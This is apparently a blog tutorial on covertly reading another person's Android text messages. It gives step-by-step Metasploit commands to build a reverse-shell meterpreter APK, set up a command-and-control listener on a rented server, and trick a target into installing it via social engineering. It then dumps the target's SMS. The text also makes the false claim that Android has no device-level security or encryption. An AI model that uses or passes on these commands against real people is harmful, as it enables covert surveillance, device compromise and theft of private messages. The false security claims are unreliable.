Is it possible to monitor someone’s text messages on Android without having their phones? The answer is a concrete yes! And this tutorial shows how to do that using the Metasploit Framework.
Android phones have zero device-level security or encryption. This means that data stored on the Android system can be accessed by apps or other methods very easily in readable formats. Anyone can essentially make an app that can send and receive data out it and be able to read it in cleartext.
And also because Android is open-sourced, it’s not too difficult for attackers to make these malicious apps that can hook into the Android system to retrieve information the attacker cares about.
What You’ll Need
I am going to be demonstrating how easy it is to monitor the text messages on my Android phone in this tutorial over the internet or wide area network (WAN).
This would be unlike the other tutorials on this same topic that are done over a local area network (LAN). Thus, you are going to be needing the following:
- A VPS server. You can rent a cheap VPS from Digital Ocean for $10 using this link.
- Metasploit-Framework Installed. On the VPS, install the latest version of Metasploit.
- An Android phone. This is going to serve as our target we are remotely monitoring their text messages.
Monitor Text Messages on Someone’s Phone Without Them Knowing
You can follow the rest of this written guide, or click this video below if you want to watch a live demo of me spying or monitoring text messages on my own Android phone.
Step 1: Acquire & Connect to the Attack VPS Server
There are very few VSP services out there that allow penetration testing or hacking activities to be done from their servers and Digital Ocean is one of them.
So head over to Digital Ocean website and create an account. When you’re signed in, create a new droplet. Droplet is what Digital Ocean calls their VPS instances.
Choose an image or distribution to install. Since Metasploit is a Debian based project we would select the latest version of Debian.
Next, you want to select a plan. The basic $10 plan which gives 2GB of RAM and 1CPU core would suffice for running this test.
Select a datacenter region. Generally, the closer the datacenter region to the target the better.
Set a password for authenticating to the VPS droplet. It’s recommended to use SSH Keys for a more secure auth but we will use a password to keep things simple.
Finally, click “Create Droplet” to spin up the server. The process is pretty fast and in a moment you’ll be presented with the IP address of your new server.
Now to connect to the server, Linux and Mac users can fire up a terminal window and type in the following command.
[email protected]<the VPS IP address>
It would prompt for the password you set during creation.
But if you’re running a Windows PC, you are going to need to install a program to communicate to the server. And Putty SSH client is the best recommendation.
Head over to their official website to download the latest version of Putty and install it. The installation is a breeze and in a moment you’re up and running.
Now to connect with Putty to your VPS server, type in the IP address of the server in the Hostname field and click open.
The username is
root and the password is the one you set during the VPS creation.
Step 2: Install Metasploit FrameWork
After you log in to the VPS server you are going to install the Metasploit Framework which is our tool of attack.
But before that let’s upgrade and update the server so that things run smoothly.
apt update && apt upgrade -y
Next, run the below command to install some dependencies.
apt install curl gnupg gnupg1 gnupg2 -y
Afterwhich run this long multi-line command to install the Metasploit package.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
After the installation completes, drop super user (root) priviledges by creating a standard user.
This is so that we can start
msfconsole as a standard user which will allow us to answer the setup questions to create the Metasploit database. Creating a database makes searching through modules much faster and also adds other perks.
adduser <give your preferred username here>
Drop from root.
su <your username goes here>
msfconsole to setup the MSF database.
Press enter on all the questions to accept and soon you’ll end up with a screen familiar to mine below when Mestasploit is started.
You can confirm the database is connected by typing
db_status within Metasploit
Step 3: Setup the Attack
With all that prep out of the way let’s get into the fun part where we setup the attack for our first target.
So there are two things we need to do.
First, we will create the payload which the target will install to penetrate their Android phone, then we’ll set up the listener or command & control (C2) server to receive the callback connection from the phone.
To create the payload type in the following command. This will generate an APK file or Android app of about 10KB that will hook the target Android phone when installed.
msfvenom -p android/meterpreter/reverse_http LHOST=10.0.0.1 LPORT=8080 > evil.apk
msfvenomis the payload generation tool within the Metasploit Framework
-pindicates the type of payload
android/meterpreter/reverse_httpis the reverse meterpreter shell that will connect the Android phone back to our listener or command & control server (C2)
LHOSTis the IP address of your VPS server
LPORTis the listening port
> evil.apkwill package/build all of that malicious code into an APK file (or Android App) which in this case we are have named ‘evil’
To set up the listener, type in the following commands. It’s important to note here that for this to work, both LHOST & LPORT should be the same as that of the payload.
use multi/handler set PAYLOAD /android/meterpreter/reverse_http set LHOST 10.0.0.1 set LPORT 8080 set exitonsession false exploit -j
Step 4: Deliver the Payload
Ok what is left is how to deliver the payload to the target Android device. And there are not too many ways an attacker could go about this than to use social enginnering techniques.
So one way to do this is by binding this malicious APK file or App into another Android App that is legitimate and then social engineer the target to install in on their phones.
Once they install it, their Android phone becomes backdoored to our Metasploit C2 server from where we can issue commands to the device.
But for the purposes of this tutorial, we are just going to access the attacker machine and download the APK payload on the Android device directly.
So we will create a quick server to enable downloading the payload using the below command.
python -m SimpleHTTPServer
Now enter the IP address of the server and the default port 8000 on a browser to access the payload.
(Don’t forget to press ctrl + c to kill the Simple HTTP server after downloading the payload)
After downloading, find the app from the file manager and install it. Launch the app and you will see all the permissions the app is requesting to run with, which is ALL permissions an Android app could request for.
Once the user runs the app, a meterpreter session or connection should be established back to our attacker machine or C2 server.
Step 5: Dump Text Messages of Target Android Phone
Finally, it’s time to monitor the text messages on the target Android phones. I say phones because as many Android devices that install and run our little backdoor app will become zombies to our online Metasploit C2 server.
So to control a particular session or device, type in the following command to interact with that session.
sessions -i <session id number>
Once you’re in a meterpreter session, you can type
help to see a list of all commands you can put in the session to control the target Android device.
You can see File System Commands for navigating around to where sensitive information or data are on the Android device. And at this point, you can easily download or upload any information or data.
There is a lot you can do with the backdoor on this Android device but our focus for this post is to monitor the text messages.
Now let’s extract every SMS text messages that have been sent back and forth with this Android device by entering the command
This will save the extracted SMS in our local directory on the VPS server. We can
cat out the file to see the content or download it from the server for closer scrutiny.
Now cross-check the extracted SMS text message with the one from my Android phone which I hacked.
You can check for new text messages on the Andriod device by running the
dump_sms command again. And if there are new SMS received on the device, they’ll be extracted and the list updated.
That is how easy it is to spy on SMS text messages on Android devices. To prevent these kind of attacks from happening to you, you should always be wary of installing applications that are not from the Play Store.
If you must install apps from outside the Play Store make sure you check what permissions you’re granting the app to run with. And if an app is requesting too many permissions than it’s necessary to run, you should uninstall or not install it at all.
Hope you enjoyed this tutorial, keep coming back for more hacking tutorials like this. If you have a question, you can ask me in the comments section below. And feel free to reach out to me @ojoiszy on Twitter and Instagram if you have tutorials you’ll love to see.